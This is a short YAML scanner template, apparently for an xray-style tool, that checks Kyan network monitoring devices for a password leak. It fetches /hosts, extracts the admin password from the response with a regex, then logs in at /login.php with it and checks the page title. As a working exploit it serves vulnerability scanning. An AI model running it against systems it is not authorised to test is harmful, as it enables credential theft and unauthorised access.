id: kyan-network-monitoring-account-password-leakage

info:
    name: Kyan Network Monitoring Account Password Leakage
    author: B1anda0(https://github.com/B1anda0)
    severity: high

rules:
    r0:
        request:
            method: GET
            path: /hosts
        expression: "true"
        output:
            search: '"Password=(?P<pass>.+)".bsubmatch(response.body)'
            pass: search["pass"]
    r1:
        request:
            method: POST
            path: /login.php
            body: user=admin&passwd={{pass}}
            follow_redirects: true
        expression: response.status == 200 && response.body.bcontains(b"<title>设备管理系统</title>") && response.body.bcontains(b"context.php") && response.body.bcontains(b"left.php")
expression: r0() && r1()
